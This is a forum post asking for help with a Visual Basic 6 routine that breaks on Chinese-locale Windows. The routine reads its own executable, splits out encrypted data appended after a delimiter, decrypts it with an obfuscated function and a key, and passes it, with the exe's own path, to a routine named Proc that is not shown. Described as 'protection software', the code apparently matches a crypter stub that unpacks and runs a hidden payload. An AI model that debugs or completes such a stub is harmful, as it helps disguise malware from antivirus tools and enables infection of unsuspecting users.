Question about unicode in visual basic 6

Hello everyone, I wrote data arrays at the end of the exe with delimiter. After I compiled, the app it didn't work on Chinese Windows, only on English, I want to configure the app to work on Chinese windows as well, I know it will work if I change the system location, but that's not what I want. I want it to work without changing the system location. I am trying to find solution the last 3 days, and it's still doesn't work. Is does anyone have experience with visual basic 6? I have suspicions that the delimiter is the problem, but i am not sure. I am pasting the part of the code here. It's a simple encryption algorithm for protection software.

`Sub most()
Dim YO As String, Datos As String, sData() As String

YO = App.Path & "\" & App.EXEName & ".exe"

Open YO For Binary As #1
Datos = Space(LOF(1))
Get #1, , Datos
Close #1

sData() = Split(Datos, "DELIMITER")

sData(1) = CGYIlOxrb(sData(1), "KEY")

Proc YO, StrConv(sData(1), vbFromUnicode)

Note: i was trying to change the delimiter like that:

sData() = Split(Datos, "ChrW(&H8FCE)")

But it's still doesn't work.

Any advice?

Also as i said, i am not sure if the delimiter is only the problem.